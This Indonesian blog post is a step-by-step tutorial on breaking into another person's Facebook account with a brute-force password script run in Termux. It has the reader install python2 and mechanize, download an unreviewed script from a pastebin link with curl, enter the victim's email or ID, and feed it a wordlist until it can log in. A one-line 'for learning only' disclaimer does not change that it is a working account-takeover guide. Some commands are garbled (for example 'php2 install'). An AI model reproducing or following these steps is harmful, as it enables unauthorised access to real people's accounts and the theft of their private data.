Cara Hack Facebook Method Brute Force Termux

Cara Hack Facebook Method Brute Force Termux


Termux merupakan tool yang dapat Anda gunakan untuk melakukan berbagai macam hal, seperti kegiatan hacking, nuyul kubik news, bitcoin, dan lain sebagainya. Dan pada kesempatan kali ini admin akan bagikan teknik hack Facebook Brute Force termux.

Sebelumnya admin juga sudah pernah membagikan tutorial hack fb Method Brute Force, namun dengan cara yang berbeda dari yang ini. Dan teknik sebelumnya sudah tidak work lagi untuk diterapkan, jadi Anda bisa menggunakan teknik ini.

Sistem kerja teknik hack Brute Force adalah dengan menyiapkan beberapa list password dan mencocokkannya secara satu persatu. Jadi, untuk keberhasilan teknik ini sangat lah kecil sekali kemungkinannya, kalau di persentase kan sekitar 30:70. Tapi, tidak ada salahnya untuk mencoba.

Cara Hack FB Brute Force Termux

Untuk melakukan hack fb dengan Method Brute Force Termux ini cukup mudah, Anda bisa mengikuti beberapa langkah-langkah berikut:

1. Pertama-tama silahkan Anda buka aplikasi termux, lalu upgrade / update dengan perintah berikut.
apt update && apt upgrade
2. Kemudian install python2 dan juga phython2 developer dengan perintah berikut ini.
apt install python2 / apt install python2-dev
3. Selanjutnya install mechanize dengan perintah sebagai berikut.
php2 install mechanize
4. Downloads file Brute Force nya dengan perintah berikut dan Download juga wordlist nya disini.
curl -S https://pastebin.com/raw/yUpg8zsv --output fb.py
5. Jalankan alat-alatnya dengan perintah.
python2 fb.py
6. Kemudian silahkan Anda masukkan email/no/id Facebook korban yang ingin di hack tersebut.


7. Masukkan wordlist nya sesuai dengan perintah dan folder file tersebut, disini file saya ada di folder downloads. Maka, perintah nya adalah sebagai berikut.
 /sdcard/Download/password.txt
8. Tekan enter kemudian tunggu hingga hasilnya keluar, Jika berhasil, maka Anda dapat langsung log-in ke akun Facebook target tersebut.


Gimana mhanx? Mudah bukan?

So, tutorial ini hanya untuk pembelajaran doang, gak lebih. Jadi, gunakanlah tutorial ini sebagai penambah wawasan. Dan jangan gunakan untuk kegiatan yang merugikan orang lain.

Demikianlah yang dapat admin bagikan kali ini tentang Cara Hack Facebook Brute Force Termux Terbaru. Jika ada pertanyaan, maka bertanyalah pada kolom komentar dibawah. Semoga bermanfaat dan terima kasih,